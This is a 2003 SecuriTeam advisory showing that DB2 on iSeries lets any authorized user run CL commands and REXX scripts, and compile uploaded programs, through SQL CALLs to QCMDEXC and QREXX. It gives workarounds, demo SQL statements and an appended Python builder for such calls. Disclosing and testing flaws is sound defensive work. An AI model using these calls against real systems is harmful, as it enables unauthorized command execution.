[NEWS] DB2 on iSeries Stored Procedures Vulnerability
From: support@securiteam.com
Date: 01/05/03
From: support@securiteam.com To: list@securiteam.com Date: 6 Jan 2003 00:14:58 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
DB2 on iSeries Stored Procedures Vulnerability
------------------------------------------------------------------------
SUMMARY
DB2 UDB for iSeries supports stored procedure calls, and its CREATE PROCEDURE
statement can reference existing program objects. Unfortunately, it does not
require that an existing program object be explicitly declared as a stored
procedure before it can be called: ANY *PGM object the connecting user is
authorized to can be invoked with a remote SQL CALL (see
http://publib.boulder.ibm.com/iseries/v5r2/ic2924/index.htm?info/sqlp/rbafymst202.htm).
DETAILS
Vulnerable systems:
* iSeries versions 3.2 - 5.2 (Verified for 4.4 - 5.1)
What is the impact of this vulnerability?
A. This vulnerability lets an otherwise limited user execute iSeries (CL)
commands.
The iSeries contains a system program, QCMDEXC, that runs the CL command
string passed to it, effectively providing a remote shell similar to the SQL
Server xp_cmdshell procedure. It takes two parameters: the command string and
its length as a DECIMAL(15,5) value. Called with those parameters from SQL,
it executes the command under the authority of the connected user profile.
B. This vulnerability lets a user execute REXX scripts.
The iSeries contains a system program, QREXX, that provides an API for
executing REXX scripts on the server. With proper parameters, this program
can be called to execute existing REXX scripts on the server.
C. A user can create new programs and new REXX scripts.
CL program sources are kept in source physical files (typically QCLSRC); REXX
scripts are kept in source files too (typically QREXSRC). Source files are
ordinary database files, so SQL can read, modify, create and delete their
records. An attacker can issue a stream of INSERT statements into a CL source
file and then compile the member through the QCMDEXC shell. Likewise, an
attacker can INSERT a REXX script into a REXX source file and run it with
either QREXX or the STRREXPRC command issued through QCMDEXC. Source files
also hold RPG, COBOL and C sources, so an attacker can in fact upload any
program source to the server, compile it and run it.
CL commands and REXX scripts can be used on their own to gain further access
to the server and database, or as a tool to download additional programs or
scripts via FTP and other means.
Workarounds and/or fixes for this vulnerability:
1. Revoke *PUBLIC authority to all *PGM objects in the system that you do not
intend to be called from SQL.
2. Revoke *PUBLIC authority to QCMDEXC and QREXX, if possible (many
applications call QCMDEXC themselves, so test before excluding *PUBLIC).
3. A security package that monitors the SQL exit programs may work, but only
for IBM's ODBC server; it will not cover other vendors' drivers nor DRDA
access.
Recreation:
The SQL statements below can be run over an AS/400 ODBC, JDBC, DRDA or OLE DB
connection, for example with the iSeries Client Access Express tools. An
account on the iSeries is required; no authority beyond *PUBLIC access to the
programs is needed.
A program can of course be written in the language of your choice to
demonstrate the same.
1. First, check that QCMDEXC has not been declared as a stored procedure (the
calls below work whether or not it has; this only shows that no declaration
is needed):
select * from sysprocs where upper(routine_name) = 'QCMDEXC'
2. Create a message queue called HACK on the server. The second parameter is
the length of the command string, 12 here, as a DECIMAL(15,5) value:
Call qcmdexc('crtmsgq hack' , 0000000012.00000)
3. Send the message "hacked you" to message queue HACK. Note the doubled
single quotes inside the SQL literal; the CL command itself is 24 characters
long, which is what the length parameter must state:
Call qcmdexc('sndmsg ''hacked you'' hack' , 0000000024.00000)
ANY iSeries program the user is authorized to can be supplied with its
parameters and executed in this way.
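The two details that usually break a hand-written QCMDEXC call are the quoting (apostrophes inside the SQL literal must be doubled) and the length parameter (it must be the length of the raw CL command, not of the escaped SQL literal, formatted as DECIMAL(15,5)). The following is an added example, not code from the advisory or from IBM: it builds the CALL statements for the recreation steps above, plus the compile and STRREXPRC steps from section C, and reproduces the advisory's two statements exactly. The library, program and member names used by the convenience builders (HACKLIB, HACKPGM, HACKRX) are placeholders chosen for this example.

```python
# Added example, not code from the SecuriTeam advisory or from IBM.
# Builds the SQL "CALL QCMDEXC(...)" statements used in the advisory.
# QCMDEXC takes two parameters: the CL command string and its length as
# DECIMAL(15,5). Library/program/member names below are placeholders.

from typing import Optional


def cl_length_literal(command: str) -> str:
    """Length of the CL command as a DECIMAL(15,5) literal, e.g. 0000000012.00000.

    DECIMAL(15,5) leaves 10 integer digits; the zero padding is not required
    by SQL but mirrors the form used in the advisory.
    """
    n = len(command)
    if n == 0:
        raise ValueError("QCMDEXC needs a non-empty command string")
    if n >= 10**10:
        raise ValueError("length does not fit DECIMAL(15,5)")
    return f"{n:010d}.00000"


def sql_string_literal(text: str) -> str:
    """Quote text as an SQL character literal, doubling embedded apostrophes."""
    return "'" + text.replace("'", "''") + "'"


def qcmdexc_call(command: str) -> str:
    """SQL statement that executes one CL command through QCMDEXC.

    The length is computed from the raw CL command, before SQL escaping,
    so a command containing apostrophes still gets the right length.
    """
    return f"CALL QCMDEXC({sql_string_literal(command)}, {cl_length_literal(command)})"


def compile_cl_call(lib: str, pgm: str, srcfile: str = "QCLSRC",
                    mbr: Optional[str] = None) -> str:
    """CALL that compiles a CL source member (the 'compile it using QCMDEXC' step).

    CRTCLPGM is the standard CL compile command; lib, pgm, srcfile and mbr
    are the caller's choice and are placeholders in this example.
    """
    mbr = mbr or pgm
    cmd = f"CRTCLPGM PGM({lib}/{pgm}) SRCFILE({lib}/{srcfile}) SRCMBR({mbr})"
    return qcmdexc_call(cmd)


def strrexprc_call(lib: str, mbr: str, srcfile: str = "QREXSRC") -> str:
    """CALL that runs a REXX source member via STRREXPRC, as section C describes."""
    return qcmdexc_call(f"STRREXPRC SRCMBR({mbr}) SRCFILE({lib}/{srcfile})")


if __name__ == "__main__":
    # The advisory's own two statements are reproduced exactly.
    print(qcmdexc_call("crtmsgq hack"))
    print(qcmdexc_call("sndmsg 'hacked you' hack"))
    # Placeholder names: HACKLIB/HACKPGM and HACKLIB/HACKRX do not come from the advisory.
    print(compile_cl_call("HACKLIB", "HACKPGM"))
    print(strrexprc_call("HACKLIB", "HACKRX"))
```

Each returned string is a complete SQL statement that can be submitted over any ODBC, JDBC, DRDA or OLE DB connection. The same builder is useful on the defensive side: run the generated statement as a low-privilege test profile after applying the workarounds above, and a failed CALL (rather than a created message queue) confirms that *PUBLIC no longer has authority to QCMDEXC.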
ADDITIONAL INFORMATION
The information has been provided by <mailto:shalom@venera.com> Shalom
Carmel.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.